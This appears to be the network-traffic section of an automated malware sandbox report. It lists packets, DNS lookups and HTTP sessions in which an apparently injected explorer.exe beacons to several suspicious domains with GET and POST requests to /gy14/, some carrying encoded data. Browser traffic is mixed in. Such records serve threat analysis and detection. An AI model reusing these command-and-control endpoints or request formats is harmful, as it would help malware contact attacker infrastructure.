                                May 27, 2024 08:44:26.563242912 CEST49763443192.168.2.4172.64.41.3
                                May 27, 2024 08:44:26.563312054 CEST44349763172.64.41.3192.168.2.4
                                May 27, 2024 08:44:26.622107029 CEST49762443192.168.2.4172.64.41.3
                                May 27, 2024 08:44:26.622169018 CEST44349762172.64.41.3192.168.2.4
                                May 27, 2024 08:44:33.142595053 CEST49816443192.168.2.4151.101.1.108
                                May 27, 2024 08:44:33.142595053 CEST49816443192.168.2.4151.101.1.108
                                May 27, 2024 08:44:33.142855883 CEST49797443192.168.2.418.244.18.38
                                May 27, 2024 08:44:33.142949104 CEST49797443192.168.2.418.244.18.38
                                May 27, 2024 08:44:54.347240925 CEST4985180192.168.2.438.174.75.236
                                May 27, 2024 08:44:54.352235079 CEST804985138.174.75.236192.168.2.4
                                May 27, 2024 08:44:54.353166103 CEST4985180192.168.2.438.174.75.236
                                May 27, 2024 08:44:54.353420019 CEST4985180192.168.2.438.174.75.236
                                May 27, 2024 08:44:54.358302116 CEST804985138.174.75.236192.168.2.4
                                May 27, 2024 08:44:54.860985994 CEST4985180192.168.2.438.174.75.236
                                May 27, 2024 08:44:54.861105919 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:54.866292953 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:54.866456985 CEST804985138.174.75.236192.168.2.4
                                May 27, 2024 08:44:54.869184971 CEST4985180192.168.2.438.174.75.236
                                May 27, 2024 08:44:54.869189978 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:54.870484114 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:54.875683069 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:54.875714064 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:54.875741005 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:54.875773907 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:54.875822067 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:54.875828981 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:54.876055956 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:54.880430937 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:54.880459070 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:54.880487919 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:54.880515099 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:54.880542040 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:54.880609035 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:54.880732059 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:54.880836964 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:54.880863905 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:54.880897045 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:54.881021976 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:54.885540009 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:54.885567904 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:54.885595083 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:54.887164116 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:54.925784111 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:54.926371098 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:54.973660946 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:54.974325895 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:55.219505072 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.219618082 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:55.224617004 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.224684000 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:55.273708105 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.273797035 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:55.300549030 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.300894022 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:55.306056023 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.306123972 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:55.306525946 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.306554079 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.306580067 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:55.306587934 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.306622028 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:55.306649923 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:55.306660891 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.306710958 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.306725025 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:44:55.306746960 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.306821108 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.306854010 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.307204008 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.310887098 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.310935020 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.310961962 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.311175108 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.311512947 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.311754942 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.353749990 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.390783072 CEST804985238.174.75.236192.168.2.4
                                May 27, 2024 08:44:55.390974998 CEST4985280192.168.2.438.174.75.236
                                May 27, 2024 08:45:14.387442112 CEST4985380192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.392482996 CEST804985318.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.393273115 CEST4985380192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.403891087 CEST4985380192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.409089088 CEST804985318.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.907557011 CEST4985380192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.907557011 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.912640095 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.913252115 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.918200970 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.923454046 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.923469067 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.923506975 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.923521996 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.923528910 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.923602104 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.923655987 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.923719883 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.923753023 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.923780918 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.923808098 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.923827887 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.924689054 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.928445101 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.928606987 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.928747892 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.928991079 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.928997993 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.929099083 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.929125071 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.929130077 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.929197073 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.929238081 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.929245949 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.929296970 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.929641962 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:14.954176903 CEST804985318.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.970074892 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:14.970844984 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:15.017688036 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:15.017893076 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:15.065747976 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:15.065951109 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:15.113739014 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:15.113806009 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:15.161822081 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:15.161885023 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:15.209796906 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:15.209853888 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:15.257895947 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:15.257980108 CEST4985480192.168.2.418.143.129.199
                                May 27, 2024 08:45:15.305854082 CEST804985418.143.129.199192.168.2.4
                                May 27, 2024 08:45:15.305965900 CEST4985480192.168.2.418.143.129.199
                                Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                Timestamp    Source IP    Dest IP    Trans ID    OP Code    Name    Type    Class    DNS over HTTPS
                                Timestamp    Source IP    Dest IP    Trans ID    Reply Code    Name    CName    Address    Type    Class    DNS over HTTPS
                                May 27, 2024 08:42:48.880688906 CEST1.1.1.1192.168.2.40xa642No error (0)prod.appnexus.map.fastly.net151.101.129.108A (IP address)IN (0x0001)false
                                May 27, 2024 08:43:11.093226910 CEST1.1.1.1192.168.2.40x267dNo error (0)www.mtdiyx.xyz66.29.149.193A (IP address)IN (0x0001)false
                                May 27, 2024 08:43:31.849898100 CEST1.1.1.1192.168.2.40x24e7Name error (3)www.169cc.xyznonenoneA (IP address)IN (0x0001)false
                                May 27, 2024 08:43:46.726468086 CEST1.1.1.1192.168.2.40x69a3Name error (3)www.169cc.xyznonenoneA (IP address)IN (0x0001)false
                                May 27, 2024 08:43:51.820311069 CEST1.1.1.1192.168.2.40x154eName error (3)www.mosaica.onlinenonenoneA (IP address)IN (0x0001)false
                                May 27, 2024 08:44:12.479780912 CEST1.1.1.1192.168.2.40x8dc6No error (0)www.venitro.comvenitro.comCNAME (Canonical name)IN (0x0001)false
                                May 27, 2024 08:44:12.479780912 CEST1.1.1.1192.168.2.40x8dc6No error (0)venitro.com3.33.130.190A (IP address)IN (0x0001)false
                                May 27, 2024 08:44:12.479780912 CEST1.1.1.1192.168.2.40x8dc6No error (0)venitro.com15.197.148.33A (IP address)IN (0x0001)false
                                May 27, 2024 08:44:33.147129059 CEST1.1.1.1192.168.2.40xa580Name error (3)www.techn9nehollywoodundead.comnonenoneA (IP address)IN (0x0001)false
                                May 27, 2024 08:44:54.343941927 CEST1.1.1.1192.168.2.40x269fNo error (0)www.aicashu.com38.174.75.236A (IP address)IN (0x0001)false
                                May 27, 2024 08:45:14.386409998 CEST1.1.1.1192.168.2.40x5f57No error (0)www.qieqyt.xyz18.143.129.199A (IP address)IN (0x0001)false
                                May 27, 2024 08:45:28.667540073 CEST1.1.1.1192.168.2.40xe177No error (0)www.qieqyt.xyz18.143.129.199A (IP address)IN (0x0001)false
                                May 27, 2024 08:45:34.810862064 CEST1.1.1.1192.168.2.40x82a8No error (0)www.tryscriptify.comtryscriptify.comCNAME (Canonical name)IN (0x0001)false
                                May 27, 2024 08:45:34.810862064 CEST1.1.1.1192.168.2.40x82a8No error (0)tryscriptify.com15.197.142.173A (IP address)IN (0x0001)false
                                May 27, 2024 08:45:34.810862064 CEST1.1.1.1192.168.2.40x82a8No error (0)tryscriptify.com3.33.152.147A (IP address)IN (0x0001)false
                                May 27, 2024 08:45:55.355439901 CEST1.1.1.1192.168.2.40x4c5No error (0)www.naples.beautyparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                May 27, 2024 08:45:55.355439901 CEST1.1.1.1192.168.2.40x4c5No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                May 27, 2024 08:45:56.705454111 CEST1.1.1.1192.168.2.40x7929No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                May 27, 2024 08:45:56.705581903 CEST1.1.1.1192.168.2.40x2405No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                May 27, 2024 08:45:56.705581903 CEST1.1.1.1192.168.2.40x2405No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                May 27, 2024 08:46:18.699352026 CEST1.1.1.1192.168.2.40xcf02Name error (3)www.6733633.comnonenoneA (IP address)IN (0x0001)false
                                May 27, 2024 08:46:18.699374914 CEST1.1.1.1192.168.2.40xcf02Name error (3)www.6733633.comnonenoneA (IP address)IN (0x0001)false
                                May 27, 2024 08:46:38.957050085 CEST1.1.1.1192.168.2.40xc092No error (0)www.camelpmkrf.com217.160.0.14A (IP address)IN (0x0001)false
                                • chrome.cloudflare-dns.com
                                • clients2.googleusercontent.com
                                • msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com
                                • https:
                                  • code.jquery.com
                                  • sb.scorecardresearch.com
                                  • acdn.adnxs.com
                                • edgeassetservice.azureedge.net
                                • www.googleapis.com
                                • www.mtdiyx.xyz
                                • www.venitro.com
                                • www.aicashu.com
                                • www.qieqyt.xyz
                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                0 | 192.168.2.4 | 49846 | 66.29.149.193 | 80 | 2580 | C:\Windows\explorer.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 27, 2024 08:43:11.099340916 CEST | 157 | OUT | GET /gy14/?4hIPNj=pMF/70cK97I4N1zsxTPsXpV8M2aXG2v92n0Y4HwmOzYT3hc8E6pR6GODiKmxyANgrdJ8&3f=_jAPZR HTTP/1.1
                                Host: www.mtdiyx.xyz
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                May 27, 2024 08:43:11.703003883 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                Date: Mon, 27 May 2024 06:43:11 GMT
                                Server: Apache
                                Accept-Ranges: bytes
                                Cache-Control: no-cache, no-store, must-revalidate
                                Pragma: no-cache
                                Expires: 0
                                Connection: close
                                Transfer-Encoding: chunked
                                Content-Type: text/html


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                1 | 192.168.2.4 | 49847 | 66.29.149.193 | 80 | 2580 | C:\Windows\explorer.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 27, 2024 08:43:15.684593916 CEST | 12360 | OUT | POST /gy14/ HTTP/1.1
                                Host: www.mtdiyx.xyz
                                Connection: close
                                Content-Length: 159760
                                Cache-Control: no-cache
                                Origin: http://www.mtdiyx.xyz
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                Content-Type: application/x-www-form-urlencoded
                                Accept: */*
                                Referer: http://www.mtdiyx.xyz/gy14/
                                Accept-Language: en-US
                                Accept-Encoding: gzip, deflate


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                2 | 192.168.2.4 | 49849 | 3.33.130.190 | 80 | 2580 | C:\Windows\explorer.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 27, 2024 08:44:12.485707045 CEST | 158 | OUT | GET /gy14/?4hIPNj=ilRqsC1g3aUEJHka8Jma3lqF5WsAbY+cTH5DMxQwz5LOdoWk4LwX5JfhUkb7yokX1OUh&3f=_jAPZR HTTP/1.1
                                Host: www.venitro.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                May 27, 2024 08:44:13.061531067 CEST | 340 | IN | HTTP/1.1 200 OK
                                Server: openresty
                                Date: Mon, 27 May 2024 06:44:12 GMT
                                Content-Type: text/html
                                Content-Length: 200
                                Connection: close
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 34 68 49 50 4e 6a 3d 69 6c 52 71 73 43 31 67 33 61 55 45 4a 48 6b 61 38 4a 6d 61 33 6c 71 46 35 57 73 41 62 59 2b 63 54 48 35 44 4d 78 51 77 7a 35 4c 4f 64 6f 57 6b 34 4c 77 58 35 4a 66 68 55 6b 62 37 79 6f 6b 58 31 4f 55 68 26 33 66 3d 5f 6a 41 50 5a 52 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?4hIPNj=ilRqsC1g3aUEJHka8Jma3lqF5WsAbY+cTH5DMxQwz5LOdoWk4LwX5JfhUkb7yokX1OUh&3f=_jAPZR"}</script></head></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                3 | 192.168.2.4 | 49850 | 3.33.130.190 | 80 | 2580 | C:\Windows\explorer.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 27, 2024 08:44:13.066353083 CEST | 12360 | OUT | POST /gy14/ HTTP/1.1
                                Host: www.venitro.com
                                Connection: close
                                Content-Length: 159760
                                Cache-Control: no-cache
                                Origin: http://www.venitro.com
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                Content-Type: application/x-www-form-urlencoded
                                Accept: */*
                                Referer: http://www.venitro.com/gy14/
                                Accept-Language: en-US
                                Accept-Encoding: gzip, deflate
                                May 27, 2024 08:44:13.222959042 CEST1236OUTData Raw: 36 54 55 79 32 74 38 75 5f 73 51 78 38 51 46 46 5f 51 78 70 7a 55 55 73 4e 57 6a 56 6c 28 67 50 6a 43 7a 6e 44 31 79 64 76 6d 57 6e 6e 54 56 69 76 64 6e 54 41 34 57 55 77 7e 34 35 46 38 49 66 52 28 49 4a 76 50 48 41 50 35 43 47 51 45 50 66 72 47
                                Data Ascii: 6TUy2t8u_sQx8QFF_QxpzUUsNWjVl(gPjCznD1ydvmWnnTVivdnTA4WUw~45F8IfR(IJvPHAP5CGQEPfrGCx0BHXFkr7j9t1KieesA4bCxW4caiCGDROTJSQMOB72zfjGk1j8imtp1KbPeiIQMjtqy-kUT3Z_KNk59qiBUbxBXz1n6cAOKlJjQIWkC1MXbWwdlV6QpvsYUF4P0GxeS5GZK_2uHWoUhPwCXR9twh1VtP0XH6XtL_


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                4 | 192.168.2.4 | 49851 | 38.174.75.236 | 80 | 2580 | C:\Windows\explorer.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 27, 2024 08:44:54.353420019 CEST | 158 | OUT | GET /gy14/?4hIPNj=nlOvXhjGD5/GGOZHcXLEDMhV39z3f5HCfGE2961zRYd5Ns2dNpc8yFLhWSyWMoAq8svn&3f=_jAPZR HTTP/1.1
                                Host: www.aicashu.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                5 | 192.168.2.4 | 49852 | 38.174.75.236 | 80 | 2580 | C:\Windows\explorer.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 27, 2024 08:44:54.870484114 CEST | 12360 | OUT | POST /gy14/ HTTP/1.1
                                Host: www.aicashu.com
                                Connection: close
                                Content-Length: 159760
                                Cache-Control: no-cache
                                Origin: http://www.aicashu.com
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                Content-Type: application/x-www-form-urlencoded
                                Accept: */*
                                Referer: http://www.aicashu.com/gy14/
                                Accept-Language: en-US
                                Accept-Encoding: gzip, deflate


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                6 | 192.168.2.4 | 49853 | 18.143.129.199 | 80 | 2580 | C:\Windows\explorer.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 27, 2024 08:45:14.403891087 CEST | 157 | OUT | GET /gy14/?4hIPNj=6Pri5y0UMTrC/YK0G3cvyv6pjPPZbeJJYk0fOdV+Oxw8pn3IGe/8E0FD3PMHkDwd7eIO&3f=_jAPZR HTTP/1.1
                                Host: www.qieqyt.xyz
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                7 | 192.168.2.4 | 49854 | 18.143.129.199 | 80 | 2580 | C:\Windows\explorer.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 27, 2024 08:45:14.918200970 CEST | 12360 | OUT | POST /gy14/ HTTP/1.1
                                Host: www.qieqyt.xyz
                                Connection: close
                                Content-Length: 159760
                                Cache-Control: no-cache
                                Origin: http://www.qieqyt.xyz
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                Content-Type: application/x-www-form-urlencoded
                                Accept: */*
                                Referer: http://www.qieqyt.xyz/gy14/
                                Accept-Language: en-US
                                Accept-Encoding: gzip, deflate


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                0 | 192.168.2.4 | 49758 | 162.159.61.3 | 443 | 5780 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-05-27 06:42:40 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                Host: chrome.cloudflare-dns.com
                                Connection: keep-alive
                                Content-Length: 128
                                Accept: application/dns-message
                                Accept-Language: *
                                User-Agent: Chrome
                                Accept-Encoding: identity
                                Content-Type: application/dns-message
                                2024-05-27 06:42:40 UTC | 247 | IN | HTTP/1.1 200 OK
                                Server: cloudflare
                                Date: Mon, 27 May 2024 06:42:40 GMT
                                Content-Type: application/dns-message
                                Connection: close
                                Access-Control-Allow-Origin: *
                                Content-Length: 468
                                CF-RAY: 88a406baeed40f67-EWR
                                alt-svc: h3=":443"; ma=86400


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                1 | 192.168.2.4 | 49759 | 172.64.41.3 | 443 | 5780 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-05-27 06:42:40 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                Host: chrome.cloudflare-dns.com
                                Connection: keep-alive
                                Content-Length: 128
                                Accept: application/dns-message
                                Accept-Language: *
                                User-Agent: Chrome
                                Accept-Encoding: identity
                                Content-Type: application/dns-message
                                2024-05-27 06:42:40 UTC | 247 | IN | HTTP/1.1 200 OK
                                Server: cloudflare
                                Date: Mon, 27 May 2024 06:42:40 GMT
                                Content-Type: application/dns-message
                                Connection: close
                                Access-Control-Allow-Origin: *
                                Content-Length: 468
                                CF-RAY: 88a406bb0f89c468-EWR
                                alt-svc: h3=":443"; ma=86400


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                2 | 192.168.2.4 | 49755 | 142.250.184.225 | 443 | 5780 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-05-27 06:42:40 UTC | 594 | OUT | GET /crx/blobs/AcO95oi6D0F4oCCXbuWOg_kTjmxw8s8dsTSOoPLH-9cazKIP4GZm10_AmRQBwhL1FQ_pwuVBiXNpeijzCuT90r5cABsKnZNHzbhDfTTzc3NFcLwgPYQKIyakH_oQpHvh_HsAxlKa5aSglzp_Czui1gLpPktRBAGI7iwW/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_77_2_0.crx HTTP/1.1
                                Host: clients2.googleusercontent.com
                                Connection: keep-alive
                                Sec-Fetch-Site: none
                                Sec-Fetch-Mode: no-cors
                                Sec-Fetch-Dest: empty
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                2024-05-27 06:42:40 UTC | 566 | IN | HTTP/1.1 200 OK
                                Accept-Ranges: bytes
                                Content-Length: 101423
                                X-GUploader-UploadID: ABPtcPpNjMUtxEXZqXWwkv8F9cM0U0vkshgCZ-H90t3fYbtpnD_CmPsXG8-dp-h2WkvuoyVrDQY
                                X-Goog-Hash: crc32c=Vv8qGQ==
                                Server: UploadServer
                                Date: Sun, 26 May 2024 17:32:24 GMT
                                Expires: Mon, 26 May 2025 17:32:24 GMT
                                Cache-Control: public, max-age=31536000
                                Age: 47416
                                Last-Modified: Thu, 23 May 2024 17:32:08 GMT
                                ETag: 9fe6b063_64469d59_d7866d74_8e62669d_f2f68bb2
                                Content-Type: application/x-chrome-extension
                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                Connection: close


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                3 | 192.168.2.4 | 49760 | 172.64.41.3 | 443 | 5780 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-05-27 06:42:40 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                Host: chrome.cloudflare-dns.com
                                Connection: keep-alive
                                Content-Length: 128
                                Accept: application/dns-message
                                Accept-Language: *
                                User-Agent: Chrome
                                Accept-Encoding: identity
                                Content-Type: application/dns-message
                                2024-05-27 06:42:40 UTC | 247 | IN | HTTP/1.1 200 OK
                                Server: cloudflare
                                Date: Mon, 27 May 2024 06:42:40 GMT
                                Content-Type: application/dns-message
                                Connection: close
                                Access-Control-Allow-Origin: *
                                Content-Length: 468
                                CF-RAY: 88a406bd2f404392-EWR
                                alt-svc: h3=":443"; ma=86400


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                4 | 192.168.2.4 | 49761 | 172.64.41.3 | 443 | 5780 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-05-27 06:42:41 UTC | 245 | OUT | POST /dns-query HTTP/1.1
                                Host: chrome.cloudflare-dns.com
                                Connection: keep-alive
                                Content-Length: 128
                                Accept: application/dns-message
                                Accept-Language: *
                                User-Agent: Chrome
                                Accept-Encoding: identity
                                Content-Type: application/dns-message
                                2024-05-27 06:42:41 UTC | 247 | IN | HTTP/1.1 200 OK
                                Server: cloudflare
                                Date: Mon, 27 May 2024 06:42:41 GMT
                                Content-Type: application/dns-message
                                Connection: close
                                Access-Control-Allow-Origin: *
                                Content-Length: 468
                                CF-RAY: 88a406c02ab143c8-EWR
                                alt-svc: h3=":443"; ma=86400


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                5 | 192.168.2.4 | 49766 | 23.43.85.133 | 443 | 5780 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                Timestamp | Bytes transferred | Direction | Data
                                2024-05-27 06:42:42 UTC | 612 | OUT | GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1717396960&P2=404&P3=2&P4=ULNdjLkH43bttteLUmqiTRcCoRkq8geCYsmFuW120olMpAB1hZlGSD7a5N19YXoBdeESSnvSJycFdjgdcmlLdA%3d%3d HTTP/1.1
                                Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com
                                Connection: keep-alive
                                MS-CV: zAvZ1Ve+Lk5FaTZ3hfzK3d
                                Sec-Fetch-Site: none
                                Sec-Fetch-Mode: no-cors
                                Sec-Fetch-Dest: empty
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                2024-05-27 06:42:42 UTC | 1249 | IN | HTTP/1.1 200 OK
                                Content-Type: application/x-chrome-extension
                                Last-Modified: Wed, 24 Jan 2024 00:25:37 GMT
